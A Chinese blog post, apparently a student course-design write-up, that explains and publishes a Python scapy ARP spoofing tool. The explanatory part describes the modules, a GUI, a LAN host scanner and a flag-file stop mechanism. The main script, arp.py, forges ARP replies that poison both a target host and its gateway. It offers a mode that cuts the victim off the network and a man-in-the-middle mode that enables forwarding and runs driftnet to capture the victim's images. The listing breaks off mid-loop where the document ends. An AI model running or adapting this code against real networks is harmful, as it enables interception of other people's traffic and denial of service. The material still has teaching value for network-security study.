<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">


























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=6.7.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.7.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.7.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.7.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.7.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.7.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="参考网络攻防实战–ARP欺骗这篇对理解整个实验很有帮助，一步步跟着做就能完成不用代码的攻击。 Python scapy实现一个简易arp攻击脚本 知识点用命令行传递参数：argparsehttps://blog.csdn.net/tumi678/article/details/80507609 程序暂停如何让程序实现“按任意键继续这个功能？”raw_input(&amp;quot;按任意键继续&amp;quot;">
<meta property="og:type" content="article">
<meta property="og:title" content="ARP欺骗攻击实战">
<meta property="og:url" content="http://betterlh.github.io/2019/09/08/ARP欺骗攻击实战/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="参考网络攻防实战–ARP欺骗这篇对理解整个实验很有帮助，一步步跟着做就能完成不用代码的攻击。 Python scapy实现一个简易arp攻击脚本 知识点用命令行传递参数：argparsehttps://blog.csdn.net/tumi678/article/details/80507609 程序暂停如何让程序实现“按任意键继续这个功能？”raw_input(&amp;quot;按任意键继续&amp;quot;">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://betterlh.github.io/2019/09/08/ARP欺骗攻击实战/input.GIF">
<meta property="og:updated_time" content="2019-09-19T10:26:44.540Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="ARP欺骗攻击实战">
<meta name="twitter:description" content="参考网络攻防实战–ARP欺骗这篇对理解整个实验很有帮助，一步步跟着做就能完成不用代码的攻击。 Python scapy实现一个简易arp攻击脚本 知识点用命令行传递参数：argparsehttps://blog.csdn.net/tumi678/article/details/80507609 程序暂停如何让程序实现“按任意键继续这个功能？”raw_input(&amp;quot;按任意键继续&amp;quot;">
<meta name="twitter:image" content="http://betterlh.github.io/2019/09/08/ARP欺骗攻击实战/input.GIF">






  <link rel="canonical" href="http://betterlh.github.io/2019/09/08/ARP欺骗攻击实战/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>ARP欺骗攻击实战 | Hexo</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Beranda</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>Tentang</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br>Kategori</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Arsip</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-schedule">

    
    
    
      
    

    

    <a href="/schedule/" rel="section"><i class="menu-item-icon fa fa-fw fa-calendar"></i> <br>Schedule</a>

  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://betterlh.github.io/2019/09/08/ARP欺骗攻击实战/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="lh">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">ARP欺骗攻击实战

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Diposting di</span>
              

              
                
              

              <time title="Post created: 2019-09-08 21:13:06" itemprop="dateCreated datePublished" datetime="2019-09-08T21:13:06+08:00">2019-09-08</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Updated at: 2019-09-19 18:26:44" itemprop="dateModified" datetime="2019-09-19T18:26:44+08:00">2019-09-19</time>
              
            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             Views:  
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a href="https://blog.csdn.net/vaeloverforever/article/details/84504876" target="_blank" rel="noopener">网络攻防实战–ARP欺骗</a><br>这篇对理解整个实验很有帮助，一步步跟着做就能完成不用代码的攻击。</p>
<p><a href="https://blog.csdn.net/u014234504/article/details/81558397" target="_blank" rel="noopener">Python scapy实现一个简易arp攻击脚本</a></p>
<h1 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h1><h2 id="用命令行传递参数：argparse"><a href="#用命令行传递参数：argparse" class="headerlink" title="用命令行传递参数：argparse"></a>用命令行传递参数：argparse</h2><p><a href="https://blog.csdn.net/tumi678/article/details/80507609" target="_blank" rel="noopener">https://blog.csdn.net/tumi678/article/details/80507609</a></p>
<h2 id="程序暂停"><a href="#程序暂停" class="headerlink" title="程序暂停"></a>程序暂停</h2><p>如何让程序实现“按任意键继续这个功能？”<br><code>raw_input(&quot;按任意键继续&quot;)</code>  这个就可以简单实现<br><code>input(&quot;按任意键继续&quot;)</code>当然这个也可以，但是他要求输入整数，所以你如果输的不是整数，程序可能会出现报错。<br>所以这哪里是按任意键继续啊！</p>
<p>字符的时候可以用raw_input()，当然不怕麻烦也可以用input()手动加’’<br>int类型的时候最好用input()<br><img src="/2019/09/08/ARP欺骗攻击实战/input.GIF" alt=""><br>搞了好一会才知道为啥报错，所以还是用raw_input()比较舒服，回车就ok了。</p>
<h1>具体程序分析在我的课设word中，这里只写一部分</h1>

<h1 id="代码思路"><a href="#代码思路" class="headerlink" title="代码思路"></a>代码思路</h1><p>4   代码<br>4.1 代码思路<br>4.1.1   如何发包<br>利用scapy模块构造应答包，来攻击目标主机。为进一步扩展程序，可以写一段代码，在攻击前扫描局域网内所以存活的主机，来确定攻击对象。<br>4.1.2   如何实现抓图嗅探功能<br>可以使用subprocess模块来调用别的程序，完成抓图嗅探功能。<br>4.1.3   如何设计图形化界面<br>可以使用一个简单的模块easygui。同时使用图形化界面也能完成传参，接收用户输入的攻击对象ip地址等信息。也能通过这个图形化界面来提示一些攻击信息。<br>4.1.4   打包程序后，没有终端交互，如何终止程序<br>使用subprocess模块，同时运行一个终端窗口，等待用户操作，并且创建一个flag文件，用于标记用户是否点击“终止”。<br>4.2 主程序代码<br>4.2.1   导入模块部分代码</p>
<p>如图导入了一下需要的模块：<br>4.2.1.1 sys<br>sys用来防止遇到中文时发生的错误。<br>4.2.1.2 easygui<br>这个是用来完成图形化界面的一个模块。比较简单。<br>4.2.1.3 argparse<br>用于解析命令行参数和选项的标准模块。<br>但实际上，我们的参数后面已经改成用easygui模块的图形化界面来进行传递。<br>4.2.1.4 threading<br>threading模块是Python里面常用的线程模块，多线程处理任务对于提升效率非常重要。<br>threading 模块中最核心的内容是Thread这个类。<br>我们在后面也是使用这个模块多多线程发包的。<br>4.2.1.5 time<br>time模块是python专门用来处理时间的内建库。这个模块非常常用。<br>4.2.1.6 subprocess<br>允许使用者创建一个新的进程让其执行另外的程序，并与它进行通信，获取标准的输入、标准输出、标准错误以及返回码等。<br>我们就是使用这个模块达到执行其他程序的目的。<br>4.2.1.7 os<br>os模块提供了多数操作系统的功能接口函数。当os模块被导入后，它会自适应于不同的操作系统平台，根据不同的平台进行相应的操作，在python编程时，经常和文件、目录打交道，所以离不了os模块。python编程时，经常和文件、目录打交道，这是就离不了os模块，本节内容将对os模块提供的函数进行详细的解读。<br>我们就是利用这个模块，操作文件。<br>4.2.1.8 scapy<br>scapy是一个可以让用户发送、侦听和解析并伪装网络报文的Python程序。这些功能可以用于制作侦测、扫描和攻击网络的工具。<br>换言之，Scapy 是一个强大的操纵报文的交互程序。它可以伪造或者解析多种协议的报文，还具有发送、捕获、匹配请求和响应这些报文以及更多的功能。Scapy 可以轻松地做到像扫描(scanning)、路由跟踪(tracerouting)、探测(probing)、单元测试(unit tests)、攻击(attacks)和发现网络(network discorvery)这样的传统任务。它可以代替hping,arpspoof,arp-sk,arping,p0f 甚至是部分的Namp,tcpdump和tshark的功能。<br>这个模块可以说是ARP欺骗的精髓。利用这个模块实现发送响应报文。<br>如：<br>Ether用来构建以太网数据包<br>ARP是构建ARP数据包的类<br>sendp方法在第二层发送数据包<br>getmacbyip方法用于通过ip获取mac地址<br>get_if_hwaddr方法获取指定网卡的mac地址<br>4.2.2   函数定义部分</p>
<p>4.2.2.1 get_mac(tgt_ip):<br>get_mac(tgt_ip):<br>调用scapy的getmacbyip函数，获取攻击目标IP的MAC地址。<br>4.2.2.2 create_arp_station与create_arp_gateway<br>create_arp_station（伪造计算机）和create_arp_gateway （伪造网关） ：<br>生成ARP数据包，伪造目标计算机欺骗网关<br>    src_mac:本机的MAC地址，充当中间人<br>    gateway_mac:网关的MAC<br>    tgt_ip:目标计算机的IP，将网关发往目标计算机的数据指向本机（中间人），形成ARP攻击<br>    gateway_ip:网关的IP<br>    op=is-at,表示ARP响应<br>4.2.3   部分图形化界面设计</p>
<p>这里用到的是easygui模块。这里面有一系列函数，例如：enterbox用来实现文本输入的图形化界面；<br>ccbox用来实现选择界面。<br>通过这里的几个图形化界面来确定攻击的对象和方式。</p>
<p>根据用户的操作，去实现不同的效果：<br>如果选择的是断网攻击，就将攻击主机的IP转发功能给关了。<br>这个功能是由ip_forward的值定的。如果是1就是开启IP转发；如果是0，就是关闭IP转发。<br>4.2.4   判断程序终止</p>
<p>这里利用subprocess和open操作打开自己创建的flag文件来实现自定义程序终止：<br>subprocess打开一个自己写的结束窗口，由于是用subprocess.popen，这个窗口的运行是不会阻断主程序运行的。这个窗口运行的同时，主程序在不断发包，控制被攻击主机的ARP缓存表。当用户想停止的时候，点击结束窗口的“finish”按钮，结束程序会改变flag文件的值。while循环的判断语句是finish的值，程序在一开始会将flag置0；而在while循环里，每次都会进行对flag文件的比较，如果flag文件的值发生了改变，那就可以知道用户想停止程序了，此时就会将finish置1，达到退出循环结束程序的目的。<br>4.2.5   发包部分代码</p>
<p>发包部分用到了threading多线程。通过多线程发包来不断攻击目标主机，控制目标主机的ARP缓存表。<br>每个Thread对象代表着一个线程，可以通过start()方法，开始运行。<br>target(): 由run()方法调用的可调用对象。<br>start()：启动线程<br>join(timeout=None): 阻塞线程，直到执行结束或超时<br>kwargs: 目标调用的关键字参数的字典<br>为了方便使用观察，调用time.sleep函数。<br>time sleep() 函数推迟调用线程的运行，可通过参数secs指秒数，表示进程挂起的时间。</p>
<p>4.3 结束窗口代码</p>
<p>这部分代码就是先前提到的结束窗口部分代码。当用户点击“finish”按钮时就会修改flag文件达到结束程序的目的。<br>4.4 扫描主机部分代码</p>
<p>这是扫描主机部分的代码。<br>这里用到了netiface和nmap模块。<br>4.4.1   def get_gateways<br>def get_gateways()这个函数调用了netifaces模块的gateways方法。netifaces.gateways()能获取网关的IP地址，方便后面对整个网段的扫描。<br>4.4.2   def get_ip_lists(ip):<br>这个函数的作用就是创建一个列表。该列表保存网关所在网段的所有主机ip地址。<br>4.4.3   main<br>main函数是扫描程序的主函数。<br>在主函数中，先调用两个事先定义好的函数：获取网关ip及其所在网段的全部IP地址（ip_lists）。<br>ret = nmScan.scan(hosts=hosts, arguments=’-sP’)这是这个扫描程序的关键所在。它能对host进行扫描，查看其是否存活。其中，hosts可以是单个IP地址也可以是一整个网段。arguments就是运用什么方式扫描，-sn就是ping扫描。因为我们要扫描整个网段，所以令hosts等于整个网段了。<br>扫描完成后，ret[‘scan’]保存存活主机及其信息，它是字典形式的，如图</p>
<p>之后用temp_ip_lists保存所有不存活主机。之后删除ip_lists中所有不存活的主机，此时ip_lists中只保存了存活的主机。然后利用ip_lists显示所有存活主机的IP地址。</p>
<h1 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h1><h2 id="arp-py（主程序）"><a href="#arp-py（主程序）" class="headerlink" title="arp.py（主程序）"></a>arp.py（主程序）</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">reload(sys)</span><br><span class="line">sys.setdefaultencoding(<span class="string">"utf-8"</span>)</span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">ARP 攻击脚本</span></span><br><span class="line"><span class="string">对于局域网内通信，运行时，输入双向欺骗目标。</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">对于局域网内目标和外部通信，运行时输入欺骗目标和网关地址</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">在ARP欺骗的同时，开启路由转发，既可获取双方通信内容。</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="keyword">import</span> easygui <span class="keyword">as</span> a</span><br><span class="line"><span class="keyword">import</span> argparse</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> scapy.all <span class="keyword">import</span> ARP, Ether, get_if_hwaddr, sendp</span><br><span class="line"><span class="keyword">from</span> scapy.layers.l2 <span class="keyword">import</span> getmacbyip</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"><span class="comment"># 注意这里面的几个方法</span></span><br><span class="line"> </span><br><span class="line"><span class="comment"># Ether用来构建以太网数据包</span></span><br><span class="line"><span class="comment"># ARP是构建ARP数据包的类</span></span><br><span class="line"><span class="comment"># sendp方法在第二层发送数据包</span></span><br><span class="line"><span class="comment"># getmacbyip方法用于通过ip获取mac地址</span></span><br><span class="line"><span class="comment"># get_if_hwaddr方法获取指定网卡的mac地址</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_mac</span><span class="params">(tgt_ip)</span>:</span></span><br><span class="line">    <span class="string">'''</span></span><br><span class="line"><span class="string">    调用scapy的getmacbyip函数，获取攻击目标IP的MAC地址。</span></span><br><span class="line"><span class="string">    '''</span></span><br><span class="line">    tgt_mac = getmacbyip(tgt_ip)</span><br><span class="line">    <span class="keyword">if</span> tgt_mac <span class="keyword">is</span> <span class="keyword">not</span> <span class="keyword">None</span>:</span><br><span class="line">        <span class="keyword">return</span> tgt_mac</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        print(<span class="string">"无法获取IP为：%s 主机的MAC地址，请检查目标IP是否存活"</span>%tgt_ip)</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create_arp_station</span><span class="params">(src_mac, tgt_mac, gateway_ip, tgt_ip)</span>:</span></span><br><span class="line">    <span class="string">'''</span></span><br><span class="line"><span class="string">    生成ARP数据包，伪造网关欺骗目标计算机</span></span><br><span class="line"><span class="string">    src_mac:本机的MAC地址，充当中间人</span></span><br><span class="line"><span class="string">    tgt_mac:目标计算机的MAC</span></span><br><span class="line"><span class="string">    gateway_ip:网关的IP，将发往网关的数据指向本机（中间人），形成ARP攻击</span></span><br><span class="line"><span class="string">    tgt_ip:目标计算机的IP</span></span><br><span class="line"><span class="string">    op=is-at,表示ARP响应</span></span><br><span class="line"><span class="string">    '''</span></span><br><span class="line">    eth = Ether(src=src_mac, dst=tgt_mac)</span><br><span class="line">    arp = ARP(hwsrc=src_mac, psrc=gateway_ip, hwdst=tgt_mac, pdst=tgt_ip, op=<span class="string">"is-at"</span>)</span><br><span class="line">    pkt = eth / arp</span><br><span class="line">    <span class="keyword">return</span> pkt</span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create_arp_gateway</span><span class="params">(src_mac, gateway_mac, tgt_ip, gateway_ip)</span>:</span></span><br><span class="line">    <span class="string">'''</span></span><br><span class="line"><span class="string">    生成ARP数据包，伪造目标计算机欺骗网关</span></span><br><span class="line"><span class="string">    src_mac:本机的MAC地址，充当中间人</span></span><br><span class="line"><span class="string">    gateway_mac:网关的MAC</span></span><br><span class="line"><span class="string">    tgt_ip:目标计算机的IP，将网关发往目标计算机的数据指向本机（中间人），形成ARP攻击</span></span><br><span class="line"><span class="string">    gateway_ip:网关的IP</span></span><br><span class="line"><span class="string">    op=is-at,表示ARP响应</span></span><br><span class="line"><span class="string">    '''</span></span><br><span class="line">    eth = Ether(src=src_mac, dst=gateway_mac)</span><br><span class="line">    arp = ARP(hwsrc=src_mac, psrc=tgt_ip, hwdst=gateway_mac, pdst=gateway_ip, op=<span class="string">"is-at"</span>)</span><br><span class="line">    pkt = eth / arp</span><br><span class="line">    <span class="keyword">return</span> pkt</span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="string">"""</span></span><br><span class="line"><span class="string">    主方法</span></span><br><span class="line"><span class="string">    """</span></span><br><span class="line">    os.system(<span class="string">r"echo 0 &gt; /root/桌面/ARP欺骗/flag.txt"</span>)</span><br><span class="line">    os.system(<span class="string">r"python /root/桌面/ARP欺骗/pingscanner.py"</span>)<span class="comment">#存活主机扫描</span></span><br><span class="line"></span><br><span class="line">    h_ip=a.enterbox(msg=<span class="string">'请输入目标主机ip'</span>, title=<span class="string">'ARP欺骗'</span>, default=<span class="string">' '</span>, strip=<span class="keyword">True</span>, image=<span class="keyword">None</span>, root=<span class="keyword">None</span>)</span><br><span class="line">    way = a.ccbox(msg=<span class="string">'选择攻击范围'</span>, title=<span class="string">'ARP欺骗'</span>, choices=(<span class="string">'局域网内攻击(破坏局域网内的主机通信)'</span>, <span class="string">'攻击网关（使目标不能上网）'</span>), image=<span class="keyword">None</span>)</span><br><span class="line">    <span class="keyword">if</span> way==<span class="number">1</span>:</span><br><span class="line">        g_ip=a.enterbox(msg=<span class="string">'请输入另一台主机'</span>, title=<span class="string">'ARP欺骗'</span>, default=<span class="string">' '</span>, strip=<span class="keyword">True</span>, image=<span class="keyword">None</span>, root=<span class="keyword">None</span>)</span><br><span class="line">        other=<span class="string">"另一台主机"</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        g_ip=a.enterbox(msg=<span class="string">'请输入目标网关'</span>, title=<span class="string">'ARP欺骗'</span>, default=<span class="string">' '</span>, strip=<span class="keyword">True</span>, image=<span class="keyword">None</span>, root=<span class="keyword">None</span>)</span><br><span class="line">        other=<span class="string">"网关"</span></span><br><span class="line"></span><br><span class="line">    method =a.ccbox(msg=<span class="string">'选择攻击方式 '</span>, title=<span class="string">'ARP欺骗'</span>, choices=(<span class="string">'ARP断网攻击'</span>, <span class="string">'ARP欺骗并截获图片'</span>), image=<span class="keyword">None</span>)</span><br><span class="line"></span><br><span class="line">    tgt_ip = h_ip</span><br><span class="line">    gateway_ip = g_ip</span><br><span class="line">    interface = <span class="string">"eth0"</span></span><br><span class="line">    <span class="keyword">if</span> method== <span class="number">1</span>:</span><br><span class="line">        res = os.system(<span class="string">r"echo 0 &gt; /proc/sys/net/ipv4/ip_forward"</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        res = os.system(<span class="string">r'echo 1 &gt; /proc/sys/net/ipv4/ip_forward'</span>)</span><br><span class="line">        subprocess.Popen(<span class="string">'driftnet -i eth0'</span>,shell=<span class="keyword">True</span>)</span><br><span class="line">    <span class="comment">#srcmac = args.srcmac</span></span><br><span class="line">    <span class="comment">#targetmac = args.targetmac</span></span><br><span class="line">    <span class="comment">#gatewaymac = args.gatewaymac</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> tgt_ip <span class="keyword">is</span> <span class="keyword">None</span> <span class="keyword">or</span> gateway_ip <span class="keyword">is</span> <span class="keyword">None</span> <span class="keyword">or</span> interface <span class="keyword">is</span> <span class="keyword">None</span>:</span><br><span class="line">        print(parser.print_help())</span><br><span class="line">        exit(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">    tgt_mac = get_mac(tgt_ip)</span><br><span class="line">    gateway_mac = get_mac(gateway_ip)</span><br><span class="line">    src_mac = get_if_hwaddr(interface)</span><br><span class="line">    m=<span class="string">'本机MAC地址是：'</span>+ src_mac +<span class="string">'\n'</span></span><br><span class="line">    m+=<span class="string">"目标计算机IP地址是："</span> + tgt_ip +<span class="string">'\n'</span></span><br><span class="line">    m+=<span class="string">"目标计算机MAC地址是："</span> + tgt_mac+<span class="string">'\n'</span></span><br><span class="line">    m+= other+<span class="string">"IP地址是："</span> + gateway_ip+<span class="string">'\n'</span></span><br><span class="line">    m+= other+<span class="string">"MAC地址是："</span> + gateway_mac</span><br><span class="line">    a.msgbox(msg= m , title= <span class="string">'ARP欺骗'</span>, ok_button=<span class="string">'start'</span>, image=<span class="keyword">None</span>, root=<span class="keyword">None</span>)</span><br><span class="line"></span><br><span class="line">    pkt_station = create_arp_station(src_mac, tgt_mac, gateway_ip, tgt_ip)</span><br><span class="line">    pkt_gateway = create_arp_gateway(src_mac, gateway_mac, tgt_ip, gateway_ip)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 如果不展示发送情况的话下面的语句可以更加简便直接用sendp方法提供的功能循环发送即可，不需要多线程和死循环。</span></span><br><span class="line">    <span class="comment"># sendp(pkt_station, inter=1, loop=1)</span></span><br><span class="line">    <span class="comment"># sendp(pkt_gateway, inter=1, loop=1)</span></span><br><span class="line">    finish=<span class="number">0</span></span><br><span class="line">    i = <span class="number">1</span></span><br><span class="line">    <span class="keyword">with</span> open(<span class="string">'/root/桌面/ARP欺骗/flag.txt'</span>,<span class="string">'r'</span>) <span class="keyword">as</span> f:</span><br><span class="line">        before=f.read()</span><br><span class="line"></span><br><span class="line">    subprocess.Popen(<span class="string">'python /root/桌面/ARP欺骗/end.py'</span>,shell=<span class="keyword">True</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">##start</span></span><br><span class="line">    <span class="keyword">while</span> finish ==<span class="number">0</span>:</span><br><span class="line">        <span class="keyword">with</span> open(<span class="string">'/root/桌面/ARP欺骗/flag.txt'</span>,<span class="string">'r'</span>) <span class="keyword">as</span> f: </span><br><span class="line">            after=f.read()  </span><br><span class="line">        <span class="keyword">if</span> after==before:</span><br><span class="line">            before=after </span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            </span><br><span class="line">            finish=<span class="number">1</span>    